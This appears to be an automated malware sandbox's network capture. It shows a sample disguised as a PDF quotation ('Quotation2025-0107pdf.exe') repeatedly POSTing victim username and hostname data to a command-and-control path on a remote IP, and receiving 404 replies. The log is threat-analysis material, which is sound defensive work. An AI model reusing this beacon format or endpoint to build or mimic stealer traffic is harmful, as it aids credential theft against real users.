                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    45192.168.2.44978894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:42.732088089 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:42.736881018 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:43.480823994 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:43 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    46192.168.2.44978994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:43.625214100 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:43.630024910 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:44.368278027 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:44 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    47192.168.2.44979094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:44.524878025 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:44.529691935 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:45.260442972 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:45 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    48192.168.2.44979194.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:45.406728983 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:45.411818027 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:46.120095968 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:46 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    49192.168.2.44979294.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:46.288589954 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:46.293457031 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:47.026279926 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:46 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    50192.168.2.44979394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:47.173974037 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:47.179130077 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:47.914865971 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:47 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    51192.168.2.44979494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:48.068721056 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:48.074620008 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:48.821242094 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:48 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    52192.168.2.44979594.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:48.979871988 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:48.984689951 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:49.713093996 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:49 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    53192.168.2.44979694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:49.857615948 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:49.862472057 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:50.609062910 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:50 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    54192.168.2.44979894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:50.752672911 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:50.758629084 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:51.495048046 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:51 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    55192.168.2.44979994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:51.650327921 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:51.655149937 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:52.422197104 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:52 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    56192.168.2.44980094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:52.562263012 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:52.567085028 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:53.323579073 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:53 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    57192.168.2.44980194.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:53.472599030 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:53.479624987 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:54.426455021 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:54 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    58192.168.2.44980394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:54.579602957 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:54.584481001 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:55.294728041 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:55 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    59192.168.2.44980494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:55.441423893 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:55.446640968 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:56.184849024 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:56 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    60192.168.2.44981094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:56.328866005 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:56.333833933 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:57.071692944 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:56 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    61192.168.2.44981694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:57.232475996 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:57.237308979 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:57.962167978 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:57 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    62192.168.2.44982294.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:58.116379976 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:58.121179104 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:58.853651047 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:58 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    63192.168.2.44982894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:58.998151064 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
